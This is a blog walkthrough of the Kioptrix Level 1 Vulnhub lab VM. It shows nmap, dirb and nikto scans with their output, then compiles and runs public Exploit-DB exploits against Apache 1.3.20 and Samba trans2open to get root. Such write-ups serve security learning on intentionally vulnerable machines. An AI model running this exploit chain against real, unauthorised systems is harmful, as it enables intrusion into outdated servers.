Kioptrix: Level 1 (#1) Vulnhub Walkthrough

So here is another really famous boot2root VM that is called Kioptrix.

Kioptrix VM Image Challenges:
This Kioptrix VM Image are easy challenges. The object of the game is to acquire root access via any means possible (except actually hacking the VM server or player). The purpose of these games are to learn the basic tools and techniques in vulnerability assessment and exploitation. There are more ways then one to successfully complete the challenges.

Source: http://www.kioptrix.com/blog/?page_id=135
Source: http://www.kioptrix.com/blog/?p=49

Filename: Kioptrix_Level_1.rar
File size: 186 MB
MD5: 6DF1A7DFA555A220054FB98BA87FACD4
SHA1: 98CA3F4C079254E6B272265608E7D22119350A37

Format: Virtual Machine (VMware)
Operating System: Linux

NetworkingShow/Hide Back To The Top
DHCP service: Enabled
IP address: Automatically assign

I start with netdiscover to find the IP of the machine

netdiscover -r 192.168.2.0/24

Continuing with nmap for open ports and services running on them.

nmap -sV -T4 -O -F --version-light 192.168.2.8
PORT      STATE SERVICE     VERSION
22/tcp    open  ssh         OpenSSH 2.9p2 (protocol 1.99)
80/tcp    open  http        Apache httpd 1.3.20 ((Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp   open  rpcbind
139/tcp   open  netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp   open  ssl/https?
32768/tcp open  rpcbind
Running: Linux 2.4.X
OS CPE: cpe:/o:linux:linux_kernel:2.4
OS details: Linux 2.4.9 - 2.4.18 (likely embedded)

So a webserver is running on ports 80.433, continuing with dirb for directory enumeration on Apache

dirb http://192.168.2.8
---- Scanning URL: http://192.168.2.8/ ----
+ http://192.168.2.8/~operator (CODE:403|SIZE:273)                                 
+ http://192.168.2.8/~root (CODE:403|SIZE:269)                                     
+ http://192.168.2.8/cgi-bin/ (CODE:403|SIZE:272)                                  
+ http://192.168.2.8/index.html (CODE:200|SIZE:2890)                               
==> DIRECTORY: http://192.168.2.8/manual/                                          
==> DIRECTORY: http://192.168.2.8/mrtg/                                            
==> DIRECTORY: http://192.168.2.8/usage/  

We found 2 users operator, root and a few directories.
Nothing interesting on the directories other than software versions that might be vulnerable.
Lets write them down
mod_ssl 2.8.4
mtrg 2.9.6
webalizer 2.01

Lets also run nikto because port 80 is always the most interesting.

nikto -h 192.168.2.8
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.2.8
+ Target Hostname:    192.168.2.8
+ Target Port:        80
+ Start Time:         2019-01-07 13:08:38 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/1.3.20 (Unix)  (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
+ Server leaks inodes via ETags, header found with file /, inode: 34821, size: 2890, mtime: Wed Sep  5 23:12:46 2001
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ OSVDB-27487: Apache is vulnerable to XSS via the Expect header
+ OpenSSL/0.9.6b appears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ mod_ssl/2.8.4 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ Apache/1.3.20 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, OPTIONS, TRACE 
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-838: Apache/1.3.20 - Apache 1.x up 1.2.34 are vulnerable to a remote DoS and possible code execution. CAN-2002-0392.
+ OSVDB-4552: Apache/1.3.20 - Apache 1.3 below 1.3.27 are vulnerable to a local buffer overflow which allows attackers to kill any process on the system. CAN-2002-0839.
+ OSVDB-2733: Apache/1.3.20 - Apache 1.3 below 1.3.29 are vulnerable to overflows in mod_rewrite and mod_cgi. CAN-2003-0542.
+ mod_ssl/2.8.4 - mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ ///etc/hosts: The server install allows reading of any system file by adding an extra '/' to the URL.
+ OSVDB-682: /usage/: Webalizer may be installed. Versions lower than 2.01-09 vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
+ OSVDB-3268: /manual/: Directory indexing found.
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /test.php: This might be interesting...
+ 8345 requests: 0 error(s) and 21 item(s) reported on remote host
+ End Time:           2019-01-07 13:10:44 (GMT-5) (126 seconds)
---------------------------------------------------------------------------

Multiple interesting Vulnerabilities found as expected and especially mod_ssl/2.8.4 that is vulnerable to a remote buffer overflow which may allow a remote shell.
Before I get to that I would also like to try SSH.

I start looking for exploits on SSH

searchsploit openssh
OpenSSH 2.x/3.0.1/3.0.2 - Channel Code Off | exploits/unix/remote/21314.txt
OpenSSH 2.x/3.x - Kerberos 4 TGT/AFS Token | exploits/linux/remote/21402.txt

Tried 21314 but I didn’t understand how to successfully use it so I moved on.

Now to Apache before going straight forward to mod_ssl

searchsploit apache 1.3

cp /usr/share/exploitdb/exploits/linux/remote/132.c /root/Desktop/apache/

gcc 132.c -o 132

Successfully compiled with a bunch of notes and Warnings.

Created users.txt on the same directory with enumerated users (operator, root) + me for credits 😛

Lets give execution permissions on the compiled binary and run it with the proper arguments.

chmod +x 132
./132 -t 192.168.2.8 -u users.txt -b

No luck. Something did work as expected I guess. Maybe different configuration on that target machine.

Searched with searchsploit again for mrtg and webalizer but nothing show up. Google had same interesting results but I was all in for Samba now as I wanted to go.

searchsploit samba 2.2.8

returned awesome results

------------------------------------------- ----------------------------------------
 Exploit Title                             |  Path
                                           | (/usr/share/exploitdb/)
------------------------------------------- ----------------------------------------
Samba 2.2.0 < 2.2.8 (OSX) - trans2open Ove | exploits/osx/remote/9924.rb
Samba 2.2.8 (BSD x86) - 'trans2open' Remot | exploits/bsd_x86/remote/16880.rb
Samba 2.2.8 (Linux Kernel 2.6 / Debian / M | exploits/linux/local/23674.txt
Samba 2.2.8 (Linux x86) - 'trans2open' Rem | exploits/linux_x86/remote/16861.rb
Samba 2.2.8 (OSX/PPC) - 'trans2open' Remot | exploits/osx_ppc/remote/16876.rb
Samba 2.2.8 (Solaris SPARC) - 'trans2open' | exploits/solaris_sparc/remote/16330.rb
Samba 2.2.8 - Brute Force Method Remote Co | exploits/linux/remote/55.c
Samba < 2.2.8 (Linux/BSD) - Remote Code Ex | exploits/multiple/remote/10.c
------------------------------------------- ----------------------------------------

So lets you exploits/multiple/remote/10.c

gcc -o smb 10.c
chmod +x 10
./10 
./10 -b 0 192.168.2.8

Aaaand root!

Leave a Reply

Your email address will not be published. Required fields are marked *